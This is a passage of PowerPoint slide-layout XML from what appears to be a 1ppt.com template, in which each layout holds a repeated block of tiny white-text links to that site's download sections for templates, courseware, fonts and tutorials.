              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout261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61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61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61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6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62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62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62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62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62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62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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout262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62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62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62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6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63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63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63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63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63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63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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout263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63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63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63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6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64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64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64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64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64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64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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
